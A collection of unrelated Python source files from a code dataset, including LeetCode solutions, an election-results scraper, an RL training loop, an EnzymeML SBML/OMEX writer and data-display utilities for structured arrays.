tmpdir = tempfile.mkdtemp()
try:
tmpdata = os.path.join(tmpdir, 'data')
os.mkdir(tmpdata)
copy(path, tmpdata)
tmparchive = os.path.join(tmpdir, 'arhive')
data = open(make_archive(tmparchive, 'zip', tmpdata), 'rb').read()
finally:
rmtree(tmpdir)
return data
def _compress_folder(path):
tmpdir = tempfile.mkdtemp()
try:
tmparchive = os.path.join(tmpdir, 'data')
data = open(make_archive(tmparchive, 'zip', path), 'rb').read()
finally:
rmtree(tmpdir)
return data
if __name__ == "__main__":
cli()
| StarcoderdataPython |
1631992 | <reponame>subramp-prep/leetcode<gh_stars>0
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: illuz <<EMAIL>[at]gmail.com>
# File: AC_hash_two_sum_n2logn.py
# Create Date: 2015-03-04 17:54:25
# Usage: AC_hash_two_sum_n2logn.py
# Descripton:
import collections
import itertools
class Solution:
# @return a list of lists of length 4, [[val1,val2,val3,val4]]
def fourSum(self, num, target):
two_sum = collections.defaultdict(list)
ret = set()
for (id1, val1), (id2, val2) in itertools.combinations(enumerate(num), 2):
two_sum[val1 + val2].append({id1, id2})
keys = two_sum.keys()
for key in keys:
if two_sum[key] and two_sum[target - key]:
for pair1 in two_sum[key]:
for pair2 in two_sum[target - key]:
if pair1.isdisjoint(pair2):
ret.add(tuple(sorted([num[i] for i in pair1 | pair2])))
del two_sum[key]
if key != target - key:
del two_sum[target - key]
return [list(i) for i in ret]
# debug
s = Solution()
print s.fourSum([2,1,0,-1], 2)
| StarcoderdataPython |
6631502 | <gh_stars>1-10
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def preorderTraversal(self, root: TreeNode) -> List[int]:
if not root or not root.val:
return []
lefts, rights = deque(), deque()
lefts.append(root)
ans = []
while lefts or rights:
if lefts:
cur = lefts.popleft()
if cur:
ans.append(cur.val)
if cur.left:
lefts.appendleft(cur.left)
if cur.right:
rights.appendleft(cur.right)
else:
cur = rights.popleft()
if cur:
ans.append(cur.val)
if cur.left:
lefts.appendleft(cur.left)
if cur.right:
rights.appendleft(cur.right)
return ans
| StarcoderdataPython |
3350812 | <reponame>oboforty/eme<gh_stars>1-10
import os
import sys
from eme.entities import load_handlers, load_settings
from eme.website import WebsiteBlueprint
from .services import auth
module_path = os.path.dirname(os.path.realpath(__file__))
conf = load_settings(os.path.join(module_path, 'config.ini'))
sys.path.append(module_path)
blueprint = None
def init_webapp(webapp, webconf):
# TODO: ITT: test with eme first?
auth.init(webapp, conf['auth'])
global blueprint
blueprint = WebsiteBlueprint('doors', conf, module_path, module_route="/users")
def init_cliapp(app, conf):
app.commands.update(load_handlers(app, 'Command', path=os.path.join(module_path, 'commands')))
def init_wsapp(app, conf):
pass
def init_dal():
pass
def init_migration():
from .dal.user import User
| StarcoderdataPython |
1796767 | <filename>data.py
from multiprocessing.pool import ThreadPool
import pandas as pd
import requests
import xmltodict
from helper import *
class Data:
def __init__(self):
self.df = pd.DataFrame(data={})
# https://volby.cz/pls/ps2017nss/vysledky_okres?nuts=CZ0806
self.downloaded = 0
self.to_download = len(NUTS)
return
# another approach would be having an index of what cities/towns are in NUTS and then
# download only needed data.
def update(self):
"""
Overwrite existing data with new ones downloaded from volby.cz by __fetch_data().
Data is downloaded for all NUTS units separately due to the limitation on server site.
:return:
"""
# It there was a change, then without a diff it is cheaper (and much faster) to delete everything
# and extract again.
# possible improvements: Keep hashes of already downloaded files.
# If newly downloaded file has the same hash, I don't need to extract it
self.df.drop(self.df.index, inplace=True)
self.df = pd.DataFrame(data={})
# Multithreading helps a lot here.
# ~ 2.717305s - with multithreading
# ~ 18.856571s - without multithreading
# still very slow though
# print("Downloading data...")
pool = ThreadPool(processes=32)
multiple_results = [pool.apply_async(
Data.__fetch_data, (self, nuts)) for nuts in NUTS]
[self.__add_to_dataframe(res.get(timeout=10)) for res in multiple_results]
#print("\n{} entries imported".format(len(self.df)))
def get_progress(self):
return "{} / {} downloaded".format(self.downloaded, self.to_download)
def __add_to_dataframe(self, x):
"""
:param x: Array of dictionaries with following keys: 'district_name', 'city_id', 'city_name', 'party',
'party_votes_percent', total_votes' [optional]
:return: Updates self.df pandas dataframe
"""
# print("#", end="")
self.downloaded += 1
self.df = self.df.append(x)
def __fetch_data(self, nuts):
"""
Download elections data from volby.cz based on selected NUTS (something between region and district) and extract
usedful data
:param nuts: something between region and district, e.g. "CZ0412", see nuts_dial.txt
:return: array[Dict of extracted data]
"""
url = "https://volby.cz/pls/ps2017nss/vysledky_okres?nuts={}".format(
nuts)
r = requests.get(url, allow_redirects=True)
while r.status_code != 200:
r = requests.get(url, allow_redirects=True)
print('Retrying {}!'.format(nuts))
filename = '{}.xml'.format(nuts)
open(filename, 'wb').write(r.content)
tmp_data = [] # performing concat once finished is cheaper that an append in foreach
with open(filename) as xml_file:
data_dict = xmltodict.parse(xml_file.read())
res = data_dict.get("VYSLEDKY_OKRES")
district = res.get("OKRES")
cities = res.get("OBEC")
for city in cities:
votes = city.get("HLASY_STRANA")
for party in votes:
tmp_data.append(
{
'district_name': district["@NAZ_OKRES"],
'city_id': city["@CIS_OBEC"],
'city_name': city["@NAZ_OBEC"],
'party': party["@KSTRANA"],
'party_votes_percent': party["@PROC_HLASU"],
'total_votes': city["UCAST"]["@PLATNE_HLASY"]
}
)
os.remove(filename)
# need to add data to pandas in the main thread, otherwise it causes data loss
return tmp_data
def find_places_by_name(self, qu):
"""
Find places by name from pandas dataframe
:param qu: Name of place, e.g. "<NAME>" (case sensitive, uses diacritics)
:return: Array of results containing "city_id", "city_name", "district_name" if found, otherwise empty dataframe
"""
# qu = "<NAME>"
# todo: make it case insensitive
res = self.df.loc[self.df['city_name'].str.startswith(qu)]
# res = self.df.loc[str.lower(self.df['city_name'].str).contains(qu, case=False)]
options = res[["city_id", "city_name",
"district_name"]].drop_duplicates()
return options
def get_votes_by_city_id(self, city_id):
return self.df.loc[self.df['city_id'] == str(city_id)]
| StarcoderdataPython |
4902850 | import numpy as np
import matplotlib as plt
import gym
import IntrinsicRewardModel
from environment import Environment
from utils import HyperParameters, one_hot_encode_action
BENCHMARK_ENVIRONMENT = 'CartPole-v0'
@staticmethod
def batch_train():
# track results
states = []
actions = []
ext_rewards = []
game_best_position = -.4
current_position = np.ndarray([0, 2])
params = HyperParameters()
env = Environment(gym.make(BENCHMARK_ENVIRONMENT))
model = IntrinsicRewardModel(env, params)
batch_size = params.batch_size
positions = np.zeros((params.iterations.training_games, 2)) # record actions
rewards = np.zeros(params.iterations.training_games) # record rewards
for game_index in range(params.iterations.training_games):
state = env.reset() # each game is a new env
game_reward = 0
running_reward = 0
for step_index in range(params.iterations.game_steps):
# act
if step_index > batch_size:
action = model.act(state)
else:
action = model.env.action_space.sample()
step = env.step(action)
action = one_hot_encode_action(action, env.action_shape())
# reward
int_r_state = np.reshape(step.state, (1, 2))
int_r_next_state = np.reshape(step.next_state, (1, 2))
int_r_action = np.reshape(action, (1, 3))
intrinsic_reward = model.get_intrinsic_reward([np.array(int_r_state), np.array(int_r_next_state),
np.array(int_r_action)])
# calc total reward
reward = intrinsic_reward + step.ext_reward
game_reward += reward
if step.state[0] > game_best_position:
game_best_position = step.state[0]
positions = np.append(current_position, [[game_index, game_best_position]], axis=0)
running_reward += 10
else:
running_reward += reward
# move state
state = step.next_state
# batch train
states.append(step.next_state)
ext_rewards.append(step.ext_reward)
actions.append(step.action)
if step_index % batch_size == 0 and step_index >= batch_size:
all_states = states[-(batch_size + 1):]
model.learn(prev_states=all_states[:batch_size],
states=all_states[batch_size:],
actions=actions[batch_size:],
rewards=ext_rewards[batch_size:])
if step.done:
break
rewards[game_index] = game_reward
positions[-1][0] = game_index
positions[game_index] = positions[-1]
_show_training_data(positions, rewards)
@staticmethod
def _show_training_data(positions, rewards):
"""
plot the training data
"""
positions[0] = [0, -0.4]
plt.figure(1, figsize=[10, 5])
plt.subplot(211)
plt.plot(positions[:, 0], positions[:, 1])
plt.xlabel('Episode')
plt.ylabel('Furthest Position')
plt.subplot(212)
plt.plot(rewards)
plt.xlabel('Episode')
plt.ylabel('Reward')
plt.show()
| StarcoderdataPython |
3546335 | __title__ = "lavarand"
__description__ = "Randomness 101: LavaRand in Production"
__url__ = "https://csprng.xyz/"
__version__ = "1.1.1.5"
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__license__ = "DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 2.0"
__copyright__ = "Copyright (C) 2018-Present <NAME>"
| StarcoderdataPython |
3559956 | '''
Created on 03.07.2020
@author: JR
'''
from libsbml import SBMLDocument, CVTerm, XMLNode, XMLTriple, XMLAttributes,\
XMLNamespaces, SBMLWriter
import libsbml
from libsbml._libsbml import BIOLOGICAL_QUALIFIER, BQB_IS
from libcombine import CombineArchive, OmexDescription, KnownFormats, VCard
import pandas as pd
import numpy as np
import os
class EnzymeMLWriter(object):
def toFile(self, enzmldoc, path):
'''
Writes EnzymeMLDocument object to an .omex container
Args:
EnzymeMLDocument enzmldoc: Previously created instance of an EnzymeML document
String path: EnzymeML file is written to this destination
'''
self.path = path + '/' + enzmldoc.getName()
try:
os.makedirs( self.path + '/data' )
except FileExistsError:
pass
doc = SBMLDocument()
doc.setLevelAndVersion(enzmldoc.getLevel(), enzmldoc.getVersion())
model = doc.createModel()
model.setName(enzmldoc.getName())
model.setId(enzmldoc.getName())
# Add references
self.__addRefs(model, enzmldoc)
# Add units
self.__addUnits(model, enzmldoc)
# Add Vessel
self.__addVessel(model, enzmldoc)
# Add protein
self.__addProteins(model, enzmldoc)
# Add reactants
self.__addReactants(model, enzmldoc)
# Add reactions
self.__addReactions(model, enzmldoc)
# Write to EnzymeML
writer = SBMLWriter()
writer.writeSBMLToFile(doc, self.path + '/experiment.xml')
# Write to OMEX
self.__createArchive(enzmldoc, doc)
os.remove(self.path + '/experiment.xml')
os.remove(self.path + '/data/data.csv')
os.rmdir(self.path + '/data')
def toXMLString(self, enzmldoc):
'''
Converts EnzymeMLDocument to XML string.
Args:
EnzymeMLDocument enzmldoc: Previously created instance of an EnzymeML document
'''
doc = SBMLDocument()
doc.setLevelAndVersion(enzmldoc.getLevel(), enzmldoc.getVersion())
model = doc.createModel()
model.setName(enzmldoc.getName())
model.setId(enzmldoc.getName())
# Add references
self.__addRefs(model, enzmldoc)
# Add units
self.__addUnits(model, enzmldoc)
# Add Vessel
self.__addVessel(model, enzmldoc)
# Add protein
self.__addProteins(model, enzmldoc)
# Add reactants
self.__addReactants(model, enzmldoc)
# Add reactions
self.__addReactions(model, enzmldoc, csv=False)
# Write to EnzymeML
writer = SBMLWriter()
return writer.writeToString(doc)
def toSBML(self, enzmldoc):
'''
Returns libSBML model.
Args:
EnzymeMLDocument enzmldoc: Previously created instance of an EnzymeML document
'''
doc = SBMLDocument()
doc.setLevelAndVersion(enzmldoc.getLevel(), enzmldoc.getVersion())
model = doc.createModel()
model.setName(enzmldoc.getName())
model.setId(enzmldoc.getName())
# Add references
self.__addRefs(model, enzmldoc)
# Add units
self.__addUnits(model, enzmldoc)
# Add Vessel
self.__addVessel(model, enzmldoc)
# Add protein
self.__addProteins(model, enzmldoc)
# Add reactants
self.__addReactants(model, enzmldoc)
# Add reactions
self.__addReactions(model, enzmldoc, csv=False)
return doc
def __createArchive(self, enzmldoc, doc):
archive = CombineArchive()
archive.addFile(
self.path + '/experiment.xml', # filename
"./experiment.xml", # target file name
KnownFormats.lookupFormat("sbml"), # look up identifier for SBML models
True # mark file as master
)
archive.addFile(
self.path + '/data/data.csv', # filename
"./data/data.csv", # target file name
KnownFormats.lookupFormat("csv"), # look up identifier for SBML models
False # mark file as master
)
# add metadata to the archive itself
description = OmexDescription()
description.setAbout(".")
description.setDescription(enzmldoc.getName())
description.setCreated(OmexDescription.getCurrentDateAndTime())
try:
for creat in enzmldoc.get_creator():
creator = VCard()
creator.setFamilyName(creat.getFname())
creator.setGivenName(creat.getGname())
creator.setEmail(creat.getMail())
description.addCreator(creator)
except AttributeError:
pass
archive.addMetadata(".", description)
# add metadata to the experiment file
location = "./experiment.xml"
description = OmexDescription()
description.setAbout(location)
description.setDescription("EnzymeML model")
description.setCreated(OmexDescription.getCurrentDateAndTime())
archive.addMetadata(location, description)
# add metadata to the csv file
location = "./data/data.csv"
description = OmexDescription()
description.setAbout(location)
description.setDescription("EnzymeML Time Course Data")
description.setCreated(OmexDescription.getCurrentDateAndTime())
archive.addMetadata(location, description)
# write the archive
out_file = "%s.omex" % enzmldoc.getName().replace(' ', '_')
try:
os.remove(self.path + '/' + out_file)
except FileNotFoundError:
pass
archive.writeToFile(self.path + '/' + out_file)
print('\nArchive created:', out_file)
def __addRefs(self, model, enzmldoc):
annot_bool = False
ref_annot = XMLNode( XMLTriple("enzymeml:references"), XMLAttributes(), XMLNamespaces() )
ref_annot.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")
try:
doi = XMLNode( enzmldoc.getDoi() )
doi_node = XMLNode( XMLTriple("enzymeml:doi"), XMLAttributes(), XMLNamespaces() )
doi_node.addChild( doi )
ref_annot.addChild(doi_node)
annot_bool = True
except AttributeError:
pass
try:
pubmedid = XMLNode( enzmldoc.getPubmedID() )
pubmed_node = XMLNode( XMLTriple("enzymeml:pubmedID"), XMLAttributes(), XMLNamespaces() )
pubmed_node.addChild( pubmedid )
ref_annot.addChild(pubmed_node)
annot_bool = True
except AttributeError:
pass
try:
url = XMLNode( enzmldoc.getUrl() )
url_node = XMLNode( XMLTriple("enzymeml:url"), XMLAttributes(), XMLNamespaces() )
url_node.addChild( url )
ref_annot.addChild(url_node)
annot_bool = True
except AttributeError:
pass
if annot_bool:
model.appendAnnotation(ref_annot)
def __addUnits(self, model, enzmldoc):
for key, unitdef in enzmldoc.getUnitDict().items():
unit = model.createUnitDefinition()
unit.setId(key)
unit.setMetaId(unitdef.getMetaid())
unit.setName(unitdef.getName())
cvterm = CVTerm()
cvterm.addResource(unitdef.getOntology())
cvterm.setQualifierType(BIOLOGICAL_QUALIFIER)
cvterm.setBiologicalQualifierType(BQB_IS)
unit.addCVTerm(cvterm)
for baseunit in unitdef.getUnits():
u = unit.createUnit()
try:
u.setKind( libsbml.UnitKind_forName(baseunit[0]) )
except TypeError:
u.setKind( baseunit[0] )
u.setExponent( baseunit[1] )
u.setScale( baseunit[2] )
u.setMultiplier( baseunit[3] )
def __addVessel(self, model, enzmldoc):
vessel = enzmldoc.getVessel()
compartment = model.createCompartment()
compartment.setId(vessel.getId())
compartment.setName(vessel.getName())
compartment.setUnits(vessel.getUnit())
compartment.setSize(vessel.getSize())
compartment.setConstant(vessel.getConstant())
compartment.setSpatialDimensions(3)
def __addProteins(self, model, enzmldoc):
for key, protein in enzmldoc.getProteinDict().items():
species = model.createSpecies()
species.setId(key)
species.setName(protein.getName())
species.setMetaId(protein.getMetaid())
species.setSBOTerm(protein.getSboterm())
species.setCompartment(protein.getCompartment())
species.setBoundaryCondition(protein.getBoundary());
species.setInitialConcentration(protein.getInitConc());
species.setSubstanceUnits(protein.getSubstanceUnits());
species.setConstant(protein.getConstant())
species.setHasOnlySubstanceUnits(False)
# add annotation
annot_root = XMLNode( XMLTriple('enzymeml:protein'), XMLAttributes(), XMLNamespaces() )
annot_root.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")
annot_sequence = XMLNode( XMLTriple('enzymeml:sequence'), XMLAttributes(), XMLNamespaces() )
sequence = XMLNode(protein.getSequence())
annot_sequence.addChild(sequence)
annot_root.addChild(annot_sequence)
try:
annot_ec = XMLNode( XMLTriple('enzymeml:ECnumber'), XMLAttributes(), XMLNamespaces() )
ecnumber = XMLNode(protein.getEcnumber())
annot_ec.addChild(ecnumber)
annot_root.addChild(annot_ec)
except AttributeError:
pass
try:
annot_uniprot = XMLNode( XMLTriple('enzymeml:uniprotID'), XMLAttributes(), XMLNamespaces() )
uniprotid = XMLNode(protein.getUniprotID())
annot_uniprot.addChild(uniprotid)
annot_root.addChild(annot_uniprot)
except AttributeError:
pass
try:
annot_org = XMLNode( XMLTriple('enzymeml:organism'), XMLAttributes(), XMLNamespaces() )
organism = XMLNode(protein.getOrganism())
annot_org.addChild(organism)
annot_root.addChild(annot_org)
except AttributeError:
pass
species.appendAnnotation(annot_root)
def __addReactants(self, model, enzmldoc):
for key, reactant in enzmldoc.getReactantDict().items():
species = model.createSpecies()
species.setId(key)
species.setName(reactant.getName())
species.setMetaId(reactant.getMetaid())
species.setSBOTerm(reactant.getSboterm())
species.setCompartment(reactant.getCompartment())
species.setBoundaryCondition(reactant.getBoundary());
if reactant.getInitConc() > 0: species.setInitialConcentration(reactant.getInitConc());
if reactant.getSubstanceunits() != 'NAN': species.setSubstanceUnits(reactant.getSubstanceunits());
species.setConstant(reactant.getConstant())
species.setHasOnlySubstanceUnits(False)
# Controls if annotation will be added
append_bool = False
reactant_annot = inchi_annot = XMLNode( XMLTriple('enzymeml:reactant'), XMLAttributes(), XMLNamespaces() )
reactant_annot.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")
try:
append_bool = True
inchi_annot = XMLNode( XMLTriple('enzymeml:inchi'), XMLAttributes(), XMLNamespaces() )
inchi_annot.addAttr('inchi', reactant.getInchi())
reactant_annot.addChild(inchi_annot)
except AttributeError:
pass
try:
append_bool = True
smiles_annot = XMLNode( XMLTriple('enzymeml:smiles'), XMLAttributes(), XMLNamespaces() )
smiles_annot.addAttr('smiles', reactant.getSmiles())
reactant_annot.addChild(smiles_annot)
except AttributeError:
pass
if append_bool == True: species.appendAnnotation(reactant_annot)
def __addReactions(self, model, enzmldoc, csv=True):
# initialize format annotation
data_root = XMLNode( XMLTriple('enzymeml:data'), XMLAttributes(), XMLNamespaces() )
data_root.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")
list_formats = XMLNode( XMLTriple('enzymeml:listOfFormats'), XMLAttributes(), XMLNamespaces() )
format_ = XMLNode( XMLTriple('enzymeml:format'), XMLAttributes(), XMLNamespaces() )
format_.addAttr( 'id', 'format0' )
# initialize csv data collection
data = []
# initialize time
index = 0
if len(list(enzmldoc.getReactionDict().items())) == 0:
raise ValueError( "Please define a reaction before writing" )
for key, reac in enzmldoc.getReactionDict().items():
reaction = model.createReaction()
reaction.setName(reac.getName())
reaction.setId(key)
reaction.setMetaId(reac.getMetaid())
reaction.setReversible(reac.getReversible())
# initialize conditions annotations
annot_root = XMLNode( XMLTriple('enzymeml:reaction'), XMLAttributes(), XMLNamespaces() )
annot_root.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")
conditions_root = XMLNode( XMLTriple('enzymeml:conditions'), XMLAttributes(), XMLNamespaces() )
temp_node = XMLNode( XMLTriple('enzymeml:temperature'), XMLAttributes(), XMLNamespaces() )
temp_node.addAttr('value', str(reac.getTemperature()) )
temp_node.addAttr('unit', reac.getTempunit())
ph_node = XMLNode( XMLTriple('enzymeml:ph'), XMLAttributes(), XMLNamespaces() )
ph_node.addAttr('value', str(reac.getPh()) )
conditions_root.addChild(temp_node)
conditions_root.addChild(ph_node)
annot_root.addChild(conditions_root)
all_elems = reac.getEducts() + reac.getProducts()
all_repls = [ repl for tup in all_elems for repl in tup[3] ]
if len( all_repls ) > 0:
# initialize replica/format annotations
replica_root = XMLNode( XMLTriple('enzymeml:replicas'), XMLAttributes(), XMLNamespaces() )
replicate = all_repls[0]
time = replicate.getData().index.tolist()
time_unit = replicate.getTimeUnit()
time_node = XMLNode( XMLTriple('enzymeml:column'), XMLAttributes(), XMLNamespaces() )
time_node.addAttr('type', 'time')
time_node.addAttr('unit', time_unit)
time_node.addAttr('index', str(index) )
format_.addChild(time_node)
data.append( time )
index += 1
# iterate over lists
# educts
for educt in reac.getEducts():
species = educt[0]
stoich = educt[1]
const = educt[2]
init_concs = educt[-1]
specref = reaction.createReactant()
specref.setSpecies(species)
specref.setStoichiometry(stoich)
specref.setConstant(const)
# if there are different initial concentrations create an annotation
try:
# DIRTY WAY ATM TO MAINTAIN FUNCTIONALITY
init_concs.remove([])
except ValueError:
pass
if len(init_concs) > 0:
conc_annot = XMLNode( XMLTriple('enzymeml:initConcs'), XMLAttributes(), XMLNamespaces() )
conc_annot.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")
for conc in init_concs:
try:
conc_node = XMLNode( XMLTriple('enzymeml:initConc'), XMLAttributes(), XMLNamespaces() )
conc_node.addAttr( "id", str(conc) )
conc_node.addAttr( "value", str(enzmldoc.getConcDict()[conc][0]) )
conc_node.addAttr( "unit", enzmldoc.getReactant(species).getSubstanceunits() )
conc_annot.addChild( conc_node )
except KeyError:
inv_initconc = { item: key for key, item in enzmldoc.getConcDict().items() }
init_entry = enzmldoc.getConcDict()[
inv_initconc[ (conc, enzmldoc.getReactant(species).getSubstanceunits() ) ]
]
conc_node = XMLNode( XMLTriple('enzymeml:initConc'), XMLAttributes(), XMLNamespaces() )
conc_node.addAttr( "id", inv_initconc[ (conc, enzmldoc.getReactant(species).getSubstanceunits() ) ] )
conc_node.addAttr( "value", str(init_entry[0]) )
conc_node.addAttr( "unit", str(init_entry[1]) )
conc_annot.addChild( conc_node )
specref.appendAnnotation(conc_annot)
for repl in educt[3]:
repl_node = XMLNode( XMLTriple('enzymeml:replica'), XMLAttributes(), XMLNamespaces() )
repl_node.addAttr('measurement', 'M0')
repl_node.addAttr('replica', repl.getReplica())
form_node = XMLNode( XMLTriple('enzymeml:column'), XMLAttributes(), XMLNamespaces() )
form_node.addAttr( 'replica', repl.getReplica() )
form_node.addAttr( 'species', repl.getReactant() )
form_node.addAttr( 'type', repl.getType() )
form_node.addAttr( 'unit', repl.getDataUnit() )
form_node.addAttr( 'index', str(index) )
form_node.addAttr( 'initConcID', str(repl.getInitConc()) )
replica_root.addChild(repl_node)
format_.addChild(form_node)
data.append( repl.getData().values.tolist() )
index += 1
# products
for product in reac.getProducts():
species = product[0]
stoich = product[1]
const = product[2]
specref = reaction.createProduct()
specref.setSpecies(species)
specref.setStoichiometry(stoich)
specref.setConstant(const)
for repl in product[3]:
repl_node = XMLNode( XMLTriple('enzymeml:replica'), XMLAttributes(), XMLNamespaces() )
repl_node.addAttr('measurement', 'M0')
repl_node.addAttr('replica', repl.getReplica())
form_node = XMLNode( XMLTriple('enzymeml:column'), XMLAttributes(), XMLNamespaces() )
form_node.addAttr( 'replica', repl.getReplica() )
form_node.addAttr( 'species', repl.getReactant() )
form_node.addAttr( 'type', repl.getType() )
form_node.addAttr( 'unit', repl.getDataUnit() )
form_node.addAttr( 'index', str(index) )
form_node.addAttr( 'initConcID', str(repl.getInitConc()) )
replica_root.addChild(repl_node)
format_.addChild(form_node)
data.append( repl.getData().values.tolist() )
index += 1
# modifiers
for modifier in reac.getModifiers():
species = modifier[0]
specref = reaction.createModifier()
specref.setSpecies(species)
for repl in modifier[-1]:
repl_node = XMLNode( XMLTriple('enzymeml:replica'), XMLAttributes(), XMLNamespaces() )
repl_node.addAttr('measurement', 'M0')
repl_node.addAttr('replica', repl.getReplica())
form_node = XMLNode( XMLTriple('enzymeml:column'), XMLAttributes(), XMLNamespaces() )
form_node.addAttr( 'replica', repl.getReplica() )
form_node.addAttr( 'species', repl.getReactant() )
form_node.addAttr( 'initConcID', str(repl.getInitConc()) )
replica_root.addChild(repl_node)
format_.addChild(form_node)
data.append( repl.getData().values.tolist() )
index += 1
try:
# add kinetic law if existent
reac.getModel().addToReaction(reaction)
except AttributeError:
pass
if len( all_repls ) > 0:
annot_root.addChild( replica_root )
reaction.appendAnnotation(annot_root)
# finalize all reactions
list_formats.addChild(format_)
list_measurements = XMLNode( XMLTriple('enzymeml:listOfMeasurements'), XMLAttributes(), XMLNamespaces() )
meas = XMLNode( XMLTriple('enzymeml:measurement'), XMLAttributes(), XMLNamespaces() )
meas.addAttr('file', 'file0')
meas.addAttr('id', 'M0')
meas.addAttr('name', 'AnyName')
list_measurements.addChild(meas)
if len( all_repls ) > 0:
list_files = XMLNode( XMLTriple('enzymeml:listOfFiles'), XMLAttributes(), XMLNamespaces() )
file = XMLNode( XMLTriple( 'enzymeml:file' ), XMLAttributes(), XMLNamespaces() )
file.addAttr('file', './data/data.csv')
file.addAttr('format', 'format0')
file.addAttr('id', 'file0')
list_files.addChild(file)
if csv:
# write file to csv
df = pd.DataFrame( np.array(data).T )
df.to_csv( self.path + '/data/data.csv', index=False, header=False)
if len( all_repls ) > 0:
data_root.addChild(list_formats)
data_root.addChild(list_files)
data_root.addChild(list_measurements)
model.getListOfReactions().appendAnnotation(data_root) | StarcoderdataPython |
9715416 | from typing import Union
class NoTokenException(Exception):
def __init__(self, value: Union[str, int]) -> None:
super().__init__()
self.value = value
def __str__(self) -> str:
return str(self.value)
| StarcoderdataPython |
5168581 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# SPDX-Short-Identifier: MIT
# (c) 2019 <NAME>
# This code is licensed under MIT license (See LICENSE.txt for details)
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, <NAME>"
__credits__ = ["<NAME>"]
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
start_day_index_ref = ["S", "M", "T", "W", "Th", "F", "S"]
def print_calendar_week(start_day: str = "S", start_month_date: int = 1) -> None:
start_day_index = start_day_index_ref.index(start_day)
print(" " * start_day_index, end="")
for i in range(start_month_date, start_month_date + 7 - start_day_index):
print("{:>3}".format(i), end="")
def print_calendar_month(start_day: str ="S", day_count: int = 1) -> None:
# Print headers
print(" S M T W Th F S")
for i in range(1, day_count+1, 7):
start_day_c = start_day if i == 1 else "S"
print_calendar_week(start_day_c, i)
print()
# This is a compatibility layer to make this code "Coursemology friendly".
# It simply takes Coursemology's input and passed it to the main function
# ...in a format the the program understands
def print_calendar(days, day_of_week):
print_calendar_month(day_of_week, days)
print_calendar(days,day_of_week) | StarcoderdataPython |
9734530 | """Tools to visualize data and display results"""
import os
import shutil
import StringIO
import cgi
import uuid
import abc
from datetime import datetime
from collections import Counter
import itertools as it
import numpy as np
from diogenes import utils
import matplotlib
if utils.on_headless_server():
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.dates
from matplotlib.pylab import boxplot
from sklearn.grid_search import GridSearchCV
from sklearn.neighbors.kde import KernelDensity
from sklearn.metrics import roc_curve, roc_auc_score, precision_recall_curve
from sklearn.tree._tree import TREE_LEAF
from sklearn.base import BaseEstimator
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
import pdfkit
from diogenes.grid_search import Experiment
from diogenes.utils import is_sa, is_nd, cast_np_sa_to_nd, convert_to_sa, cast_list_of_list_to_sa
if hasattr(plt, 'style'):
# Make our plots pretty if matplotlib is new enough
plt.style.use('ggplot')
def pprint_sa(M, row_labels=None, col_labels=None):
"""Prints a nicely formatted Structured array (or similar object) to console
Parameters
----------
M : numpy.ndarray or list of lists
structured array or homogeneous array or list of lists to print
row_labels : list or None
labels to put in front of rows. Defaults to row number
col_labels : list of str or None
names to label columns with. If M is a structured array, its column
names will be used instead
"""
M = utils.check_sa(M, col_names_if_converted=col_labels)
if row_labels is None:
row_labels = xrange(M.shape[0])
col_labels = M.dtype.names
# From http://stackoverflow.com/questions/9535954/python-printing-lists-as-tabular-data
col_lens = [max(max([len('{}'.format(cell)) for cell in M[name]]),
len(name)) for name in col_labels]
row_label_len = max([len('{}'.format(label)) for label in row_labels])
row_format =('{{:>{}}} '.format(row_label_len) +
' '.join(['{{:>{}}}'.format(col_len) for col_len
in col_lens]))
print row_format.format("", *col_labels)
for row_name, row in zip(row_labels, M):
print row_format.format(row_name, *row)
__describe_cols_metrics = [('Count', len),
('Mean', np.mean),
('Standard Dev', np.std),
('Minimum', min),
('Maximum', max)]
__describe_cols_fill = [np.nan] * len(__describe_cols_metrics)
def describe_cols(M, verbose=True):
"""Returns summary statistics for a numpy array
Parameters
----------
M : numpy.ndarray
structured array
Returns
-------
numpy.ndarray
structured array of summary statistics for M
"""
M = utils.check_sa(M)
descr_rows = []
for col_name, col_type in M.dtype.descr:
if 'f' in col_type or 'i' in col_type:
col = M[col_name]
row = [col_name] + [func(col) for _, func in
__describe_cols_metrics]
else:
row = [col_name] + __describe_cols_fill
descr_rows.append(row)
col_names = ['Column Name'] + [col_name for col_name, _ in
__describe_cols_metrics]
ret = convert_to_sa(descr_rows, col_names=col_names)
if verbose:
pprint_sa(ret)
return ret
def table(col, verbose=True):
"""
Creates a summary or the number of occurrences of each value in the column
Similar to R's table
Parameters
----------
col :np.ndarray
Returns
-------
np.ndarray
structured array
"""
col = utils.check_col(col)
cnt = Counter(col)
cat_and_cnt = sorted(cnt.iteritems(), key=lambda item: item[0])
ret = convert_to_sa(cat_and_cnt, col_names=('col_name', 'count'))
if verbose:
pprint_sa(ret)
return ret
def crosstab(col1, col2, verbose=True):
"""
Makes a crosstab of col1 and col2. This is represented as a
structured array with the following properties:
1. The first column is the value of col1 being crossed
2. The name of every column except the first is the value of col2 being
crossed
3. To find the number of cooccurences of x from col1 and y in col2,
find the row that has 'x' in col1 and the column named 'y'. The
corresponding cell is the number of cooccurrences of x and y
Parameters
----------
col1 : np.ndarray
col2 : np.ndarray
Returns
-------
np.ndarray
structured array
"""
col1 = utils.check_col(col1, argument_name='col1')
col2 = utils.check_col(col2, argument_name='col2')
col1_unique = np.unique(col1)
col2_unique = np.unique(col2)
crosstab_rows = []
for col1_val in col1_unique:
loc_col1_val = np.where(col1==col1_val)[0]
col2_vals = col2[loc_col1_val]
cnt = Counter(col2_vals)
counts = [cnt[col2_val] if cnt.has_key(col2_val) else 0 for col2_val
in col2_unique]
crosstab_rows.append(['{}'.format(col1_val)] + counts)
